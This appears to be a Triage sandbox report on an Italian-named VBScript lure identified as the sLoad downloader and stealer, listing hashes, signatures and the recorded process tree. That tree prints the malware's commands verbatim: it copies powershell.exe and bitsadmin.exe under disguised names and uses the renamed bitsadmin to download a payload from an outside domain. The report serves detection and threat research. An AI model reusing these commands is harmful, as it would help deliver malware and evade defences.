sload | 96bd66aedb565c6d29e60d7e7880047749abcd1cfa2d7b27f612b7b32038ede5 | Triage

Analysis

max time kernel
29s
max time network
27s
platform
windows7_x64
resource
win7v200722
submitted
14-09-2020 12:13

Sharing

Report Analysis Logs

General

Target

Allegato_doc_07501560150.vbs
Size

4KB
MD5

e307bc020a581429ed10ee79a4db315c
SHA1

bdcd95f51bda66a11d0147f932f01245f715c1b9
SHA256

96bd66aedb565c6d29e60d7e7880047749abcd1cfa2d7b27f612b7b32038ede5
SHA512

79f815e81d3c70f097a001ba9f331f1ff8a8d82ae425348c994af777fa610cb28c4ce364c80e744177f051f860799f6716e25ca93dba573cc2bfb3c7116b2dde

Score

10^/10

trojan stealer sload

Malware Config

Signatures

sLoad
sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.
trojan stealer sload
Executes dropped EXE 1 IoCs

Processes:

NOXGAdE.exe

pid process

1580 NOXGAdE.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 1088 wrote to memory of 1752	1088	WScript.exe	cmd.exe
PID 1088 wrote to memory of 1752	1088	WScript.exe	cmd.exe
PID 1088 wrote to memory of 1752	1088	WScript.exe	cmd.exe
PID 1088 wrote to memory of 320	1088	WScript.exe	cmd.exe
PID 1088 wrote to memory of 320	1088	WScript.exe	cmd.exe
PID 1088 wrote to memory of 320	1088	WScript.exe	cmd.exe
PID 1088 wrote to memory of 1580	1088	WScript.exe	NOXGAdE.exe
PID 1088 wrote to memory of 1580	1088	WScript.exe	NOXGAdE.exe
PID 1088 wrote to memory of 1580	1088	WScript.exe	NOXGAdE.exe
PID 1088 wrote to memory of 1580	1088	WScript.exe	NOXGAdE.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Allegato_doc_07501560150.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1088

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zNOXGAdE.exe
2⤵
PID:1752

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\NOXGAdE.exe
2⤵
PID:320

C:\Users\Admin\AppData\Roaming\NOXGAdE.exe
"C:\Users\Admin\AppData\Roaming\NOXGAdE.exe" /transfer tycgYf /download https://sapphireloading.com/sal/07501560150/maps.jpg C:\Users\Admin\AppData\Roaming\maps.jpg
2⤵
- Executes dropped EXE
PID:1580

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\NOXGAdE.exe

Download Submit
C:\Users\Admin\AppData\Roaming\NOXGAdE.exe

Download Submit
memory/320-1-0x0000000000000000-mapping.dmp

Download
memory/1580-3-0x0000000000000000-mapping.dmp

Download
memory/1752-0-0x0000000000000000-mapping.dmp

Download